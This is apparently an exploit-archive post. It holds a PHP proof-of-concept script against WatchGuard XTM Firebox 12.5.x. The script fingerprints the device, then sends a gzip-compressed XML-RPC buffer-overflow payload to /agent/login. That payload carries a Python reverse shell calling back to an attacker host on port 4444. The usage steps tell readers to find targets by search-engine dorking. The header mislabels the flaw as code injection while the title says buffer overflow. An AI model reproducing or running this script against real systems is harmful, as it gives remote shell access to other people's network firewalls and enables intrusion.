WatchGuard XTM Firebox 12.5.x Buffer Overflow

`=============================================================================================================================================  
| # Title : WatchGuard XTM Firebox 12.5.x Code Injection Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 130.0.2 (64 bits) |  
| # Vendor : https://www.watchguard.com/wgrd-help/documentation/xtm |  
=============================================================================================================================================  
  
POC :  
  
[+] Dorking İn Google Or Other Search Enggine.  
  
[+] uses the CURL to Allow remote command .  
  
[+] Line 86 set your target .  
  
[+] save code as poc.php .  
  
[+] USage : cmd => c:\www\test\php poc.php   
  
[+] PayLoad :  
  
  
<?php  
class WatchGuardExploit {  
private $targetUri;  
private $lhost;  
private $lport;  
private $shell;  
  
public function __construct($targetUri, $lhost, $lport, $shell = "/usr/bin/python") {  
$this->targetUri = $targetUri;  
$this->lhost = $lhost;  
$this->lport = $lport;  
$this->shell = $shell;  
}  
  
public function sendRequest($method, $url, $data = null, $headers = []) {  
$ch = curl_init();  
  
curl_setopt($ch, CURLOPT_URL, $url);  
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);  
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);  
  
if ($data) {  
curl_setopt($ch, CURLOPT_POSTFIELDS, $data);  
}  
  
if (!empty($headers)) {  
curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);  
}  
  
$response = curl_exec($ch);  
curl_close($ch);  
  
return $response;  
}  
  
public function checkWatchGuardFirebox() {  
$url = $this->targetUri . '/auth/login';  
$response = $this->sendRequest('GET', $url, null, ['from_page' => '/']);  
  
if ($response && strpos($response, 'Powered by WatchGuard Technologies') !== false   
&& strpos($response, 'Firebox') !== false) {  
return true;  
}  
return false;  
}  
  
public function createBofPayload() {  
// Generate the buffer overflow payload with Python reverse shell code  
$randomStr = bin2hex(random_bytes(2)); // 4-character random alphanumeric  
$pyFilename = "/tmp/" . $randomStr . ".py";  
$payload = "<methodCall><methodName>agent.login</methodName><params><param><value><struct><member><value><" . str_repeat('A', 3181) . "MFA>";  
$payload .= str_repeat('<BBBBMFA>', 3680);  
  
// Include a Python reverse shell command as the payload  
$payload .= 'import socket;from subprocess import call; from os import dup2;';  
$payload .= 's=socket.socket(socket.AF_INET,socket.SOCK_STREAM);';  
$payload .= 's.connect(("' . $this->lhost . '",' . $this->lport . '));';  
$payload .= 'dup2(s.fileno(),0); dup2(s.fileno(),1); dup2(s.fileno(),2);';  
$payload .= 'call(["' . $this->shell . '","-i"]);';  
$payload .= 'import os; os.remove("' . $pyFilename . '");';  
  
return gzencode($payload); // gzip encoding  
}  
  
public function exploit() {  
if (!$this->checkWatchGuardFirebox()) {  
echo "Target is not vulnerable.\n";  
return;  
}  
  
echo "Target is vulnerable. Sending exploit...\n";  
$bofPayload = $this->createBofPayload();  
  
// Send the buffer overflow payload  
$url = $this->targetUri . '/agent/login';  
$this->sendRequest('POST', $url, $bofPayload, [  
'Accept-Encoding: gzip, deflate',  
'Content-Encoding: gzip'  
]);  
  
echo "Payload sent.\n";  
}  
}  
  
// Example usage:  
$exploit = new WatchGuardExploit('https://target-ip:8080', 'attacker-ip', 4444);  
$exploit->exploit();  
  
  
  
Greetings to :=====================================================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|  
===================================================================================================  
`